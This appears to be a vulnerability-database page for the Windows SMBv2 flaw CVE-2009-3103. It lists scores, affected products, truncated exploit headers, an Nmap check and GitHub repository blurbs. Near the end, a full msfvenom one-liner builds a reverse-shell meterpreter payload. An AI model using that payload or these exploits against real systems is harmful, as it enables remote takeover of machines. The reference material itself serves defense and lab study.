CVE-2009-3103

Published: 08/09/2009 Updated: 07/12/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote malicious users to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.

Vulnerable Products

microsoft windows server 2008

microsoft windows server 2008 sp2

microsoft windows vista

Exploits

# EDB-Note: Source ~ raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
#!/usr/bin/python
#This module depends on the linux command line program smbclient
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python
#The idea is that after th ...
#!/usr/bin/python
# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed, notified by Laurent Gaffié, i did not know this but his blog post can be found here:
# g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
import socket,sys,time
print "Maliformed negotiate pro ...
#!/usr/bin/python
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
#infinite loop
#NO BSOD, YOU GOTTA PULL THE PLUG
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent ...
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
---------------------------------------------------------------------
Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!
Tested on:
Vista sp2 (6.0.6002.18005)
Vista sp1 ultimate (6.0.6001.18000)
Kudos for: Stephen, HDM, Laurent G ...
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require ...
=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD

II. BACKGROUND
-----------------
...

Nmap Scripts

smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.

nmap --script smb-vuln-cve2009-3103.nse -p445 <host>
nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 <host>

Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|       Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|       Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|       denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|       PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|       aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
|
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Github Repositories

Vulnerability-Asessment-Kioptrix-Level-1-Vulnhub
I created this repository to document the Vulnerability Assessment process for the Kioptrix Level 1 machine from the VulnHub platform. Link Source: the Kioptrix Level 1 machine from VulnHub can be downloaded for free from its official website at: www.vulnhub.com/entry/kioptrix-level-1-1,22/ VirtualBox preparation: www

Today we are hacking into a highly recommended beginner CTF called Kioptrix. I had some troubles installing the machine from VulnHub so, in case you face some errors, I am providing you the .OVA file for the vulnerable machine.

CTF #1 - Kioptrix
Today we are hacking into a highly recommended beginner CTF called Kioptrix. I had some troubles installing the machine from VulnHub so, in case you face some errors, I am providing you the .OVA file for the vulnerable machine. You can download it here. As always, let's start with my setup:
My Setup
A VirtualBox VM running Kali Linux
Another VM running

Repository for python exploits

python-exploits
Repository for python exploits
MS08-067
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. W

Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)

Microsoft-Windows---srv2sys-SMB-Code-Execution-Python-MS09-050-
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
Exploit for CVE-2009-3103
Overview
This Python script is an updated version of a public exploit for CVE-2009-3103. The original code relied on the SMBconnection module, which has been replaced in this version to make the script more v

Public exploits and modifications

Exploits
Public exploits modifications
CVE-2002-0082 Apache mod_ssl < 2.8.7 OpenSSL - OpenFuckV2.c Remote Buffer Overflow. Fixes compilation errors.
CVE-2009-3103 Remote Code Execution via "SMBv2 Negotiation Vulnerability". Fixes compilation errors.
CVE-2017-0143 aka MS17-010 Remote Code Execution vulnerability in Microsoft SMBv1. Fixes compilation errors.
CVE-2003-

CVE-2009-3103 ms09-050

ms09-050_CVE-2009-3103
CVE-2009-3103 ms09-050
# One liner to create/generate a payload for windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --bad-chars "\x00" --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/
One liner start meterpreter
msfconsole -x "use exploit/multi/h